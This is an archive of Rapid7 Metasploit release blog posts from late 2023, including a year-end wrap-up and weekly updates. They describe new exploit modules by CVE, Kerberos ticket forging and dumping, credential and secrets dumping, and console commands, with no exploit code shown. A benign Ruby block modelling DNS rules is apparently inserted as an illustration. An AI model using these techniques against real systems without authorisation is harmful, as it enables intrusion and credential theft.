Tag Archives: Metasploit

Metasploit 2023 Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/12/29/metasploit-2023-wrap-up/


As 2023 winds down, we’re taking another look back at all the changes and improvements to the Metasploit Framework. This year marked the 20th anniversary since Metasploit version 1.0 was committed and the project is still actively maintained and improved thanks to a thriving community.

Version 6.3

Early this year in January, Metasploit version 6.3 was released with a number of improvements for targeting Active Directory environments. The crowning achievement of this effort was the integration of native Kerberos authentication. With this in place, HTTP, LDAP, MSSQL, SMB and WinRM modules can all make use of Kerberos authentication, enabling a swath of new attack techniques and workflows. In addition to the existing modules that are now capable of authenticating with Kerberos, multiple Kerberos-specific modules were added for a variety of tasks, such as requesting tickets from the Key Distribution Center (the KDC, which in Active Directory is almost always a Domain Controller), forging tickets from known secrets, and inspecting the contents of tickets.

This functionality was highlighted in Black Hat USA’s Arsenal demonstrations, a recording of which can be found online.

Fetch Based Payloads

In May 2023, Metasploit released a new set of payloads, dubbed the Fetch Payloads, which make exploitation of OS-command-executing vulnerabilities easier for users. At the time of the release, about two-thirds of exploits added to the Metasploit Framework in the previous year resulted in the execution of an OS command, either due to direct injection or via some other means such as deserialization. While OS command execution is becoming more common, it often limits the type of payloads that can easily be added to an exploit, since the most advanced payloads, including Meterpreter, aren’t available as OS commands.

Prior to the Fetch Payloads, exploit authors were burdened with the work necessary to convert Meterpreter payloads to something deliverable as an OS command. This led to extra work and inconsistent implementations that often lacked the flexibility our users desire. The new pattern uses the Fetch Payloads, which allows the Framework to handle this automatically. The result is less work for exploit developers and a higher degree of control for end users. We expect to see Fetch Payloads continue to be used widely well past 2024 and to have new variants added.

Even More Kerberos Improvements

While the Metasploit 6.3 release provided support for native Kerberos authentication for Metasploit, we’ve since built on it to add even more. These features didn’t make it into the original 6.3 release in January but have since shipped in weekly releases:

  • The auxiliary/admin/kerberos/forge_ticket module was expanded to support the diamond and sapphire techniques in addition to the original golden and silver techniques.
  • The auxiliary/admin/kerberos/forge_ticket module was also updated to account for the additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
  • We added the post/windows/manage/kerberos_tickets post module, which enables users to dump Kerberos tickets from a compromised host. Its functionality is similar to the popular Rubeus tool’s klist/dump commands, and it operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
  • The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Fewer DNS Leaks

One of the best features of Metasploit is the seamless way in which users can use established Meterpreter and SSH sessions to tunnel traffic as configured by the route command or often the post/multi/manage/autoroute module. Until this year, these connections would resolve hostnames to IP addresses from the system on which the Metasploit Framework was running, which could potentially leak information to listening parties. Thanks to a combined effort by sempervictus and smashery, Metasploit can now be configured to use a custom DNS server that is optionally accessed via an established session. This feature is currently behind a feature flag and requires users to run features set dns_feature true before it can be accessed.

Once enabled, the dns command allows users to configure how they would like to resolve DNS hostnames. Users can simply specify a single server to handle all queries, or use a wildcard syntax to send DNS queries for one domain to a specific server and non-matching queries to another. The weekly wrap up for the original release contains more detailed notes and usage examples.

Discoverability Improvements

A more recent change to the Framework brought a new feature to allow searching for more fields within modules. By enabling hierarchical search with features set hierarchical_search_table true, users will now find search queries that match module actions, targets, and AKA aliases. For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to be included in the search results when forge_golden is the query because forging golden tickets is one of the actions that it supports.

Users can also discover new capabilities and how to use them by browsing our new docs site at docs.metasploit.com. This site’s source code is included within Metasploit itself, making it easy for users to contribute improvements and their own workflows.

Payload Improvements

Exploits are at the core of what we do on the Metasploit team, but they would be nothing without our payloads. This year saw multiple improvements to our payloads — some changes closed feature gaps, while others added net new functionality. Some highlights include:

  • Smashery updated our Java Meterpreter payloads with an important fix to the loader to enable compatibility with the latest versions of OpenJDK.
  • Salu90 added a new API to the Windows Meterpreter and a post module to use it that allows users to set the session’s token to a new value.
  • JustAnda7 updated the Windows Meterpreter to display IPv6 routes for inspection when the user runs the Meterpreter route command (not to be confused with the Framework route command).
  • Ishaanahuja7 added support to Meterpreter for running natively on Apple’s new ARM-based chips.
  • Sempervictus added native sessions for AWS Instance connections and AWS SSM agents. These session types are noteworthy because while they require access tokens, they do not require a payload to be run on the target and can be used to open a session on a target that Metasploit is otherwise unable to communicate with.
  • usiegl00 and Ishaanahuja7 both contributed enhancements to add support for OSX AArch64 Meterpreter payloads, which enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Additionally, GitHub Actions are now being used to measure the feature coverage of the Meterpreter API commands. It’s a lesser-known fact that the Meterpreter payload has multiple implementations for different architectures and platforms. This means some features may be present in one and not another. This is the reason the Mimikatz kiwi plugin isn’t available when the java/meterpreter/reverse_tcp payload is used. To help us and the community track this information, a report including a coverage matrix is now generated automatically. This report can be accessed by navigating to the project’s Actions tab, selecting “Acceptance”, the latest run, and finally downloading the “final-report”.

Module Highlights

  • CVE-2022-47966 – This particular vulnerability was an RCE in multiple ManageEngine products. A combined effort by cdelafuente-r7 and h00die-gr3y brought exploits for the ServiceDesk Plus, ADSelfService Plus, and Endpoint Central products.

  • CVE-2023-34362 (Exploit) – The MOVEit exploit leverages one of the more high-profile vulnerabilities to have been released this year. This module exploits a SQL injection to leak sensitive data in order to upload a .NET deserialization payload which results in code execution in the context of NT AUTHORITY\SYSTEM and was a combined effort by sfewer-r7, rbowes-r7, and bwatters-r7.

  • CVE-2023-32560 (Exploit) – This vulnerability is an unauthenticated RCE in Ivanti Avalanche MDM that would result in code execution as NT AUTHORITY\SYSTEM. The module was submitted by EgeBalci and is one of the very few memory corruption exploits added this year.

  • CVE-2023-46214 (Exploit) – Chocapikk made their first contributions this year, one of which is for an authenticated RCE in Splunk Enterprise.

  • CVE-2023-22952 (Exploit) – This exploit was contributed by community member h00die-gr3y back in January of 2023. While it may seem like old news nearly a year later, this zero-day gained a lot of attention when it first came to light. This exploit brought along with it new mixin capabilities for Metasploit to embed PHP payloads in PNG images. This opens the door for future exploit modules to drop payloads inside of PNGs with ease.

  • CVE-2023-20887 (Exploit) – This module was added by community contributor sinsinology (with help from community contributor h00die). There were a few Metasploit modules released this year that targeted VMware products; however, this one stands out above the rest. Targeting the popular VMware Aria Operations for Networks software, this module enabled attackers to gain unauthenticated code execution in the context of the root user on a wide range of affected software versions.

  • CVE-2023-27350 (Exploit) – Speaking of modules written for celebrity vulnerabilities, let’s not leave out the PaperCut NG Authentication Bypass, brought to the framework by Metasploit’s one and only Christophe De La Fuente. Christophe’s contribution helped pen testers better assess the security of systems hosting PaperCut NG and ease the concerns of their clients during a stressful time in the cybersecurity ecosystem. The module exploits all affected versions of PaperCut NG and returns an elevated Meterpreter session.

  • Post Module – Written by Spencer McIntyre of the Metasploit team, this module highlights the framework’s new, powerful Kerberos capabilities. Bringing with it a large number of railgun enhancements, this module allows Kerberos tickets to be exported from a compromised host and added to Metasploit’s own cache, allowing them to be used in subsequent attacks. The Kerberos work, along with this module, helps streamline many different types of attacks that can be performed in and around Domain environments. If you haven’t tested Metasploit’s Kerberos authentication capabilities yet, put it at the top of your to-do list for 2024!

  • CVE-2023-28252 (Exploit) – The Common Log File System (CLFS) driver is a fantastic vector for attacks; it’s installed on all the latest versions of Windows and saw more abuse in 2023. Ransomware gangs exploited this vulnerability to gain SYSTEM level access on Windows 10, 11 and Server 2022. Metasploit team member Jack Heysel wrote this module that uses the Reflective DLL template in order to drop a low level PoC which returns a session running in the context of NT AUTHORITY\SYSTEM.

  • CVE-2023-40044 (Exploit) – Another exploit that made big waves this year was the WS_FTP server running the Ad Hoc Transfer module .NET deserialization vulnerability. The module and the initial research behind how the vulnerability actually works was brought to us by Metasploit’s very own, veteran contributor, Stephen Fewer. The exploit module runs reliably on a wide range of affected targets. Everyone loves a module where all you have to do is: select the module, input the IP address of the machine running the vulnerable software, run the module, and get a SYSTEM-level session.

Contributors

We would like to give a big thank you to all of the contributors who sent us code in 2023. Whether it was bug fixes, enhancements, or exploits, we appreciate the work you put into making Metasploit better. In 2023, we received pull requests from the following 75 people (ordered by count). Of these, 49 made their first contribution to Metasploit this year.

  • h00die
  • bcoles
  • smashery
  • h00die-gr3y
  • jmartin-tech
  • ErikWynter
  • EgeBalci
  • ismaildawoodjee (new in 2023)
  • wvu
  • jvoisin
  • sempervictus
  • rorymckinley (new in 2023)
  • rad10
  • manishkumarr1017 (new in 2023)
  • Ryuuuuu (new in 2023)
  • prabhatjoshi321 (new in 2023)
  • Chocapikk (new in 2023)
  • Jemmy1228 (new in 2023)
  • AleksaZatezalo (new in 2023)
  • emirpolatt (new in 2023)
  • heyder
  • steve-embling
  • dm-ct (new in 2023)
  • ide0x90
  • archcloudlabs
  • samsepi0x0 (new in 2023)
  • Lorenyx (new in 2023)
  • MikeAnast (new in 2023)
  • loredous (new in 2023)
  • bradyjackson (new in 2023)
  • nfsec
  • HynekPetrak
  • whotwagner (new in 2023)
  • rtpt-erikgeiser
  • errorxyz (new in 2023)
  • e-lliot (new in 2023)
  • gcarmix (new in 2023)
  • j0ev (new in 2023)
  • xaitax (new in 2023)
  • cudalac (new in 2023)
  • bka-dev
  • cnnrshd (new in 2023)
  • pbarry25 (new in 2023)
  • D00Movenok (new in 2023)
  • gardnerapp (new in 2023)
  • rodnt (new in 2023)
  • hahwul (new in 2023)
  • JustAnda7
  • Guilhem7 (new in 2023)
  • shellchocolat (new in 2023)
  • sdcampbell (new in 2023)
  • attl4s (new in 2023)
  • distortedsignal (new in 2023)
  • spmedia (new in 2023)
  • YiDa858 (new in 2023)
  • j-baines (new in 2023)
  • catatonicprime
  • vtoutain (new in 2023)
  • SubcomandanteMeowcos (new in 2023)
  • samueloph (new in 2023)
  • araout42 (new in 2023)
  • Pflegusch (new in 2023)
  • tekwizz123
  • rohitkumarankam (new in 2023)
  • jeffmcjunkin
  • MegaManSec
  • bugch3ck
  • raboof (new in 2023)
  • JBince (new in 2023)
  • Frycos (new in 2023)
  • neterum (new in 2023)
  • mkonda (new in 2023)
  • serializingme (new in 2023)
  • k0pak4
  • npm-cesium137-io
  • hamax97 (new in 2023)

Metasploit Weekly Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2023/12/22/metasploit-weekly-wrap-up-39/

Getting Looney with Privilege Escalation


As if Metasploit couldn’t get any loonier, this release adds a brand new exploit module for Glibc Tunables Privilege Escalation aka Looney Tunables. Now, using linux/local/glibc_tunables_priv_esc, you can check your target’s glibc version to see if it’s vulnerable to buffer overflow, as outlined in CVE-2023-4911. If so, the module will drop a python script and escalate your privilege to the root user, allowing you to execute malicious code. Happy Tuning!

New module content (3)

Vinchin Backup and Recovery Command Injection

Authors: Gregory Boddin (LeakIX) and Valentin Lobstein
Type: Exploit
Pull request: #18542 contributed by Chocapikk
Path: linux/http/vinchin_backup_recovery_cmd_inject

Description: This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.

Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)

Authors: Qualys Threat Research Unit, blasty, and jheysel-r7
Type: Exploit
Pull request: #18541 contributed by jheysel-r7
Path: linux/local/glibc_tunables_priv_esc

Description: This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.

Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)

Authors: jheysel-r7
Type: Exploit
Pull request: #18566 contributed by jheysel-r7
Path: multi/http/atlassian_confluence_unauth_backup

Description: This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then log in with the credentials from the backup file to gain administrative access to the server.

Enhancements and features (2)

  • #18622 from zeroSteiner – Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
  • #18623 from gardnerapp – This updates the file handling of the generate command’s -o parameter to expand file system paths.

Bugs fixed (1)

Documentation added (1)

  • #18477 from AleksaZatezalo – This adds documentation for the auxiliary/scanner/nessus/nessus_rest_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/15/metasploit-weekly-wrap-up-38/

Continuing the 12th Labor of Metasploit


Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS_REP Roasting, which allows retrieving the password hashes of users who have the "Do not require Kerberos preauthentication" setting enabled on the domain controller. The setting is disabled by default, but it is enabled in some environments.

Attackers can request the hash for any user with that option enabled, and worse (or better?) you can query the DC to determine which accounts have this setting, so not only can you get these hashes, the DC will tell you which users are vulnerable to the attack. Metasploit’s AS_REP roasting module will both gather the users and pull the authentication information, or pull information on a select set of users.

Ticket Management

This week’s release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. This module will copy all of the tickets that are accessible at the current privilege level to Metasploit’s own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation from within Metasploit; there’s even new documentation which outlines the entire process.

New module content (3)

Find Users Without Pre-Auth Required (ASREP-roast)

Author: smashery
Type: Auxiliary
Pull request: #18569 contributed by smashery
Path: gather/asrep

Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms for obtaining usernames, brute forcing from a list of usernames or using an LDAP query to request the relevant usernames, followed by requesting TGTs for them.

Splunk Authenticated XSLT Upload RCE

Authors: Valentin Lobstein, h00die, and nathan
Type: Exploit
Pull request: #18577 contributed by Chocapikk
Path: unix/http/splunk_xslt_authenticated_rce

Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

Kerberos Ticket Management

Authors: Spencer McIntyre and Will Schroeder
Type: Post
Pull request: #18488 contributed by zeroSteiner
Path: windows/manage/kerberos_tickets

Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit’s own cache, allowing them to be used for the duration in which they are valid.

Enhancements and features (3)

  • #18539 from dwelch-r7 – This adds a new session type for SMB sessions. The smb session is behind a feature flag and can be enabled by setting features set smb_session_type true in msfconsole.
  • #18598 from bwatters-r7 – This bumps the Metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows Server 2016-present or Windows 10/11+.
  • #18601 from MikeAnast – Adds arm64 support to Metasploit’s Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.

Bugs fixed (4)

  • #18606 from Lorenyx – rpc_plugin has been updated to correctly use the provided plugin options.
  • #18609 from adfoster-r7 – This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
  • #18613 from dwelch-r7 – Ensures that after listing files within an SMB directory that the handle is closed.
  • #18614 from sjanusz-r7 – Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Wrap-Up 12/8/2023

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/08/metasploit-wrap-up-12-8-2023/

Are You Looking for ACTION?


Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.


Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

Enhancements and features (5)

  • #17667 from h00die – Makes various performance and output readability improvements to Metasploit’s password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there are no hashes left, and empty tables are no longer printed. Other code optimizations include added support for Hashcat username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner – This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y – This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds advanced detection logic (a check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary commands into the UPnP service via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 – Updates Metasploit’s Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 – Adds hierarchical search table support to Metasploit’s search command functionality. The search table now includes a module’s actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.

Bugs fixed (1)

  • #18603 from h00die – Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous – Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/12/01/metasploit-weekly-wrap-up-37/

Customizable DNS resolution


Contributor smashery added a new dns command to the Metasploit console, which allows the user to customize the behavior of DNS resolution. Similar to the route command, it is now possible to specify where DNS requests should be sent, to avoid any information leak. Before these changes, the Framework used the default local system resolver configuration. Now, it is possible to specify which DNS server should be queried based on rules that match specific hostnames or domains. It is also possible to route DNS requests through an existing session, which is useful when querying a DNS server located in an internal network that can only be reached through a pivot host.

The DNS feature must be enabled to make this command available with features set dns_feature true. Then, use dns help to list the default commands:

msf6 > features set dns_feature true
dns_feature => true
msf6 > dns help
Manage Metasploit's DNS resolution behaviour

Usage:
  dns [add] [--session <session_id>] [--rule <wildcard DNS entry>] <IP Address> <IP Address> ...
  dns [remove/del] -i <entry id> [-i <entry id> ...]
  dns [purge]
  dns [print]

Subcommands:
  add - add a DNS resolution entry to resolve certain domain names through a particular DNS server
  remove - delete a DNS resolution entry; 'del' is an alias
  purge - remove all DNS resolution entries
  print - show all active DNS resolution entries

Examples:
  Display all current DNS nameserver entries
    dns
    dns print

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10
    route add --rule *.metasploit.com 192.168.1.10

  Add multiple entries at once
    route add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2
    route add --session 2 --rule *.metasploit.com 192.168.1.10

  Delete the DNS resolution rule with ID 3
    route remove -i 3

  Delete multiple entries in one command
    route remove -i 3 -i 4 -i 5

  Set the DNS server(s) to be used for all requests that match no rules
    route add 8.8.8.8 8.8.4.4

Once set up, any name resolution will be performed according to these rules. For example, setting RHOSTS to a hostname with set RHOST www.example.com, together with a rule added by dns add --session 1 --rule *.example.com 10.10.1.1, will force the Framework to resolve the hostname by sending a DNS request to the internal DNS server at 10.10.1.1 through session 1. No other requests will be sent, which avoids leaking information.
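The following Ruby is an added illustration of the rule table described here and in the Fewer DNS Leaks section of the 2023 wrap-up above; it is not Metasploit's own code nor the implementation behind the dns command. It assumes fnmatch-style wildcard matching (so *.example.com matches www.example.com but not example.com), an optional session binding per rule, default servers for names that match no rule, and a refusal to resolve at all when nothing applies; the 10.10.1.1 / session 1 configuration is a constructed sample.

```ruby
# Added illustration (not Metasploit's own code): a small rule-based
# resolver modelling the behaviour of the `dns` command.  Each rule maps a
# wildcard pattern such as "*.example.com" to one or more nameservers and,
# optionally, to the id of the session the query must be tunnelled through.
# Names that match no rule go to the default servers; when there are none,
# the lookup is refused instead of falling through to the host's system
# resolver, which is exactly the leak the feature is meant to avoid.
require 'ipaddr'

# Where a query should go: the servers to ask, the session to use (nil means
# direct from the Framework host) and the id of the rule that matched.
Target = Struct.new(:servers, :session, :rule_id)

class DnsResolutionTable
  def initialize
    @rules = []     # ordered: the first matching rule wins
    @defaults = []  # servers for names that match no rule
    @next_id = 1
  end

  # Equivalent of `dns add [--session N] [--rule PATTERN ...] SERVER ...`.
  # A call with no patterns defines the default servers.  Returns the ids of
  # the rules created (nil for defaults).
  def add(servers, patterns: [], session: nil)
    servers = servers.map { |s| IPAddr.new(s).to_s } # rejects malformed addresses
    raise ArgumentError, 'at least one server is required' if servers.empty?
    if patterns.empty?
      raise ArgumentError, 'default servers cannot be bound to a session' if session
      @defaults.concat(servers)
      return nil
    end
    patterns.map do |pattern|
      id = @next_id
      @next_id += 1
      @rules << { id: id, pattern: pattern.downcase, servers: servers, session: session }
      id
    end
  end

  # Equivalent of `dns remove -i ID`; returns true if a rule was deleted.
  def remove(id)
    !@rules.reject! { |r| r[:id] == id }.nil?
  end

  # Equivalent of `dns purge`.
  def purge
    @rules.clear
    @defaults.clear
  end

  # Decide where a query for +hostname+ goes.  Returns a Target, or nil when
  # neither a rule nor a default applies (the query must not be sent).
  def resolve_target(hostname)
    name = hostname.downcase.chomp('.') # normalise case and a trailing dot
    rule = @rules.find { |r| File.fnmatch(r[:pattern], name, File::FNM_CASEFOLD) }
    return Target.new(rule[:servers], rule[:session], rule[:id]) if rule
    return nil if @defaults.empty?
    Target.new(@defaults, nil, nil)
  end
end

# Constructed sample configuration mirroring the scenario in the text:
# *.example.com resolves through the internal server 10.10.1.1, reachable
# only via session 1; everything else goes to public resolvers.
def example_table
  t = DnsResolutionTable.new
  t.add(['10.10.1.1'], patterns: ['*.example.com'], session: 1)
  t.add(['8.8.8.8', '8.8.4.4'])
  t
end

if __FILE__ == $PROGRAM_NAME
  t = example_table
  %w[www.example.com db.corp.example.com metasploit.com example.com].each do |h|
    target = t.resolve_target(h)
    where = target ? "#{target.servers.join(',')} via session #{target.session.inspect}" : 'refused'
    puts "#{h} -> #{where}"
  end
end
```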

Tickets in the sky with diamond

Smashery also enhanced the existing Kerberos ticket-forging module and added support for the Diamond and Sapphire techniques, which are similar to the Golden and Silver Tickets but stealthier. The Diamond technique consists of taking a real TGT and modifying its PAC, assuming the krbtgt Kerberos key is known. The Sapphire technique uses S4U2Self and U2U (User-to-User) to obtain the PAC of another user and assembles it with an existing TGT to impersonate that user.

New module content (1)

WordPress Royal Elementor Addons RCE

Authors: Fioravante Souza and Valentin Lobstein
Type: Exploit
Pull request: #18567 contributed by Chocapikk
Path: multi/http/wp_royal_elementor_addons_rce

Description: This pull request adds a new exploit module for CVE-2023-5360, an unauthenticated file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin in versions before 1.3.79.

Enhancements and features (5)

  • #18526 from smashery – This adds a new dns command in Metasploit, to allow the user to customize the behavior of DNS resolution in the framework. DNS resolution can be set to be routed through a session via a specific Comm channel or to request a specific DNS server. Routing rules ensure DNS queries are not sent to unwanted DNS servers and avoid the leak of information.
  • #18560 from smashery – This updates the existing Kerberos ticket-forging module with new actions for forging tickets with fields copied from ones issued by the legitimate KDC using the Diamond and Sapphire techniques.
  • #18565 from zeroSteiner – This adds an enhancement to adjust the kerberos cache lookup logic. If no TGT for the specific host is found, it will try again but with any host. This fixes the workflow where a user can currently forge a golden ticket, but that ticket will not be automatically used for authentication by other services. This will also fix the future issue of the TGT that’s created by the Diamond and Sapphire techniques.
  • #18571 from smashery – Improves the error messages shown to users if there is a validation error with a module’s RHOST datastore values. Now, the user is notified when there is a failure with parsing a URL, invalid CIDR, or DNS resolution failure.
  • #18580 from adfoster-r7 – Metasploit modules developed using Python can now provide default_options as part of an exploit.

Bugs fixed (1)

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

  • #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
  • #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

  • #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
  • #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
  • #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
  • #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
  • #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/11/17/metasploit-weekly-wrap-up-36/

Possible Web Service Removal

Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

  • #18440 from adfoster-r7 – This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

Documentation added (1)

  • #18524 from bradyjackson – Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/11/10/metasploit-weekly-wrap-up-35/

Apache MQ and Three Cisco Modules in a Trenchcoat

This week’s release has a lot of new content and features modules targeting two major recent vulnerabilities that got a great deal of attention: CVE-2023-46604 targeting Apache MQ resulting in ransomware deployment and CVE-2023-20198 targeting Cisco IOS XE OS.

New module content (8)

Cisco IOS-XE unauthenticated Command Line Interface (CLI) execution

Author: sfewer-r7
Type: Auxiliary
Pull request: #18507 contributed by sfewer-r7
Path: admin/http/cisco_ios_xe_cli_exec_cve_2023_20198

Description: This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.

MagnusBilling application unauthenticated Remote Command Execution.

Authors: Eldstal and h00die-gr3y
Type: Exploit
Pull request: #18481 contributed by h00die-gr3y
Path: linux/http/magnusbilling_unauth_rce_cve_2023_30258

Description: This adds an exploit module that leverages CVE-2023-30258, a command injection vulnerability in MagnusBilling versions 6 and 7 that allows unauthenticated remote code execution in the context of the user running the web server process.

Apache ActiveMQ Unauthenticated Remote Code Execution

Authors: X1r0z and sfewer-r7
Type: Exploit
